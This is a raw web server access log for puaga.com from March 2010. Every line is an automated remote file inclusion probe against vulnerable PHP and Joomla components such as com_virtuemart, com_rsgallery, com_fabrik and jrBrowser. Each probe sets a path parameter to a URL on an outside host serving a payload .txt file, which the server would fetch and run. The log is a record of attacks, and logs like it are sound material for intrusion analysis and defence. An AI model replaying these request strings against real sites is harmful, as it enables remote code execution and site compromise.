212.241.177.123 - - [05/Mar/2010:09:17:48 -0800] "GET /logs/access_100218.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:50 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [05/Mar/2010:09:17:50 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:20:45 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:09:21:01 -0800] "GET /logs///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:09:21:06 -0800] "GET /logs/access.log///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [05/Mar/2010:09:21:17 -0800] "GET /logs/e404.php?_SERVER[DOCUMENT_ROOT]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
194.242.113.160 - - [05/Mar/2010:09:21:17 -0800] "GET /e404.php?_SERVER[DOCUMENT_ROOT]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:09:21:26 -0800] "GET /logs/access_100209.log//include/engine/content/elements/menu.php?%20CONFIG[AdminPath]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:21:38 -0800] "GET /logs///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:21:38 -0800] "GET /logs/access.log///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:21:38 -0800] "GET //libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:24:53 -0800] "GET //libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:24:53 -0800] "GET /logs///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:09:24:53 -0800] "GET /logs/access.log///libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.132.213.93 - - [05/Mar/2010:09:26:22 -0800] "GET /orange_g/forum/index.php HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "puaga.com"
218.38.243.44 - - [05/Mar/2010:09:27:35 -0800] "GET /logs//galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:27:35 -0800] "GET /galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:27:35 -0800] "GET /logs/access_100220.log%20%20//galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [05/Mar/2010:09:29:30 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
174.37.143.198 - - [05/Mar/2010:09:29:31 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:30:22 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:30:22 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:30:22 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:30:23 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:30:23 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:09:30:58 -0800] "GET /logs/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:09:30:58 -0800] "GET /become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:09:30:58 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:30:59 -0800] "GET /logs/access_100225.log//?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:30:59 -0800] "GET /logs//?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:30:59 -0800] "GET /?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:09:31:04 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:31:17 -0800] "GET /skin_shop/standard/3_plugin_twindow/errors.php?error=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:31:42 -0800] "GET /logs/home.php?index=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:31:42 -0800] "GET /home.php?index=http://201.199.194.8/conta/auto1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:31:42 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:31:50 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:32:05 -0800] "GET /logs/access_100128.log//?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:32:26 -0800] "GET /logs/access_100221.log//skin_shop/standard/3_plugin_twindow/errors.php?error=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:32:27 -0800] "GET /skin_shop/standard/3_plugin_twindow/errors.php?error=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
79.174.73.50 - - [05/Mar/2010:09:32:27 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/errors.php?error=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:32:45 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:32:45 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:32:45 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:32:53 -0800] "GET /logs/access_100225.log//?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:32:53 -0800] "GET /?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [05/Mar/2010:09:33:51 -0800] "GET /logs/access_100128.log//?_zb_path=http://www.dk-shop.com.ua///administrator/components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:33:55 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:34:35 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:34:36 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:35:23 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:35:37 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:15 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:15 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:15 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:20 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:20 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:20 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:27 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:27 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:27 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:27 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:27 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:36:28 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:36:51 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:36:51 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:36:52 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:36:52 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:36:52 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:09:36:52 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:09:37:36 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:09:37:37 -0800] "GET /logs/access_100205.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:09:37:39 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:37:43 -0800] "GET /logs/access_100218.log/home.php?index=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:09:37:48 -0800] "GET /logs/access_100204.log/home.php?index=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:09:37:59 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:09:37:59 -0800] "GET /become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:09:37:59 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:09:37:59 -0800] "GET /logs/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:38:10 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:38:14 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:38:42 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:38:42 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:38:42 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:38:43 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:38:45 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:39:17 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:39:17 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:39:17 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:39:22 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:39:22 -0800] "GET /logs/access_100217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:09:39:22 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:39:27 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:39:27 -0800] "GET /logs/access_100222.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:39:27 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:09:40:03 -0800] "GET /logs/access_100203.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:08 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:08 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:08 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:11 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:11 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:11 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [05/Mar/2010:09:40:14 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:40:28 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:09:40:32 -0800] "GET /logs/access_100217.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:09:40:32 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:47 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:47 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:47 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
